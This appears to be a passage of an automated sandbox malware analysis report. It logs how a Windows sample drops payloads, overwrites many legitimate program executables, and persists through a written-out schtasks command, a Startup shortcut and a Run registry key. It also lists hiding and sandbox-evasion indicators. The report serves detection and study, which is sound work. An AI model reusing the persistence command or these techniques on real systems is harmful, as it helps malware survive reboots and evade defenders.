Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Users\Public\Libraries\aymtmquJ.pif File created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7z.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\AppVClient.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zG.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\firefox.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\FXSSVC.exe Jump to dropped file
Source: C:\Users\Public\Libraries\aymtmquJ.pif File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\alg.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7zFM.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe Jump to dropped file
Source: C:\Users\Public\Libraries\aymtmquJ.pif File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Juqmtmya.PIF Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe File created: C:\Users\Public\Libraries\aymtmquJ.pif Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file

Boot Survival

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006ECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 13_2_006ECBD0
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Juqmtmya Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02D0AB1C
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\Public\Libraries\aymtmquJ.pif Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2AC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2EE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: 2DA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 22C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 2380000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 4380000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Memory allocated: 54C0000 memory reserve | memory write watch
